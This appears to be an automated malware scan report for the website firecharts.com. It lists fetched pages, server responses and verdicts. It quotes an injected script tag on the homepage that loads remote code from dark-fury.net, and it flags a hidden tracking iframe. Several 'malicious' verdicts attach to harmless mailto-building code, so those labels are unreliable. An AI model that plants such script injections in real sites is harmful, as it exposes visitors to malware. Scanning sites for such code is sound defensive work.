Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=firecharts.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.firecharts.com/ | 200 OK Content-Length: 23657 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://dark-fury.net/mbtbczcz.php?id=11609083"></script> | ||
http://user.financialcontent.com/marketsnapshot.cgi?account=guest&template=2&title=Market Snapshot&headcolor=ff8000&headfontset=Verdana~Center~2~true~false&bodycolor=00000&bodyfontset=Verdana~1&bordercolor=000000&headfontcolor=00000&bodyfontcolor=FFFFFF&borderinwidth=1&borderincolor=C0C0C0 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 26 Jan 2015 10:25:29 GMT Location: http://markets.financialcontent.com/stocks/?borderinwidth=1&bordercolor=000000&borderincolor=C0C0C0&bodyfontset=Verdana~1&headfontcolor=00000&template=2&bodycolor=00000&bodyfontcolor=FFFFFF&account=guest&headfontset=Verdana~Center~2~true~false&title=Market+Snapshot&headcolor=ff8000 Server: Apache/2.4.9 (Debian) mod_perl/2.0.8 Perl/v5.20.1 Vary: Accept-Encoding Content-Length: 534 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from markets.financialcontent.com | clean |
http://markets.financialcontent.com/stocks/?borderinwidth=1&bordercolor=000000&borderincolor=c0c0c0&bodyfontset=verdana~1&headfontcolor=00000&template=2&bodycolor=00000&bodyfontcolor=ffffff&account=guest&headfontset=verdana~center~2~true~false&title=market+snapshot&headcolor=ff8000 | 200 OK Content-Length: 78278 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<a href="mailto:support'); document.write('@financialcontent.com">Email Support'); document.write('</a>'); Antivirus reports:
| ||
http://markets.financialcontent.com//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 26 Jan 2015 10:25:31 GMT Location: http://markets.financialcontent.com/stocks/ajax/libs/jquery/1.4.2/jquery.min.js Server: Apache/2.4.9 (Debian) mod_perl/2.0.8 Perl/v5.20.1 Vary: Accept-Encoding Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from markets.financialcontent.com | clean |
http://markets.financialcontent.com/stocks/ajax/libs/jquery/1.4.2/jquery.min.js | 404 Not Found Content-Length: 39753 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<a href="mailto:support'); document.write('@financialcontent.com">Email Support'); document.write('</a>'); Antivirus reports:
| ||
http://js.financialcontent.com/FCON/FCON.js | 200 OK Content-Length: 7851 Content-Type: application/x-javascript | clean |
http://markets.financialcontent.com/stocks?Module=fcadunit728top&Output=JS | 200 OK Content-Length: 1881 Content-Type: text/javascript | clean |
http://markets.financialcontent.com/stocks?Module=tickerbar&Output=JS | 200 OK Content-Length: 8602 Content-Type: text/javascript | clean |
http://ads.pro-market.net/ads/scripts/site-128638.js | 200 OK Content-Length: 1242 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 1x1 src: http://pbid.pro-market.net/engine?site= <iframe width='1' height='1' marginwidth='0' marginheight='0' hspace='0' vspace='0' frameborder='0' scrolling='no' src='http://pbid.pro-market.net/engine?site="+ site +";size=1x1;category="+ cat +";kw="+ kw + siteref +";rnd=(" + new date().gettime() + " )'> | ||
http://tags.crwdcntrl.net/c/3100/cc.js?ns=_cc3100 | 200 OK Content-Length: 33199 Content-Type: application/x-javascript | clean |
http://markets.financialcontent.com/stocks?Module=getquote&Output=JS | 200 OK Content-Length: 8146 Content-Type: text/javascript | clean |
http://markets.financialcontent.com/stocks?Module=fcadunit728bottom&Output=JS | 200 OK Content-Length: 1884 Content-Type: text/javascript | clean |
http://markets.financialcontent.com/stocks/markets | 200 OK Content-Length: 78065 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<a href="mailto:support'); document.write('@financialcontent.com">Email Support'); document.write('</a>'); Antivirus reports:
| ||
http://ads.financialcontent.com/www/delivery/ag.php | 200 OK Content-Length: 3295 Content-Type: application/x-javascript | clean |
http://markets.financialcontent.com/stocks/stocks | 200 OK Content-Length: 60307 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<a href="mailto:support'); document.write('@financialcontent.com">Email Support'); document.write('</a>'); Antivirus reports:
| ||
http://markets.financialcontent.com/stocks/funds | 200 OK Content-Length: 59219 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<a href="mailto:support'); document.write('@financialcontent.com">Email Support'); document.write('</a>'); Antivirus reports:
| ||
http://markets.financialcontent.com/stocks/sectors | 200 OK Content-Length: 50963 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<a href="mailto:support'); document.write('@financialcontent.com">Email Support'); document.write('</a>'); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: firecharts.com
Result:
GET / HTTP/1.1
Host: firecharts.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: firecharts.com
Referer: http://www.google.com/search?q=firecharts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: firecharts.com
Referer: http://www.google.com/search?q=firecharts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.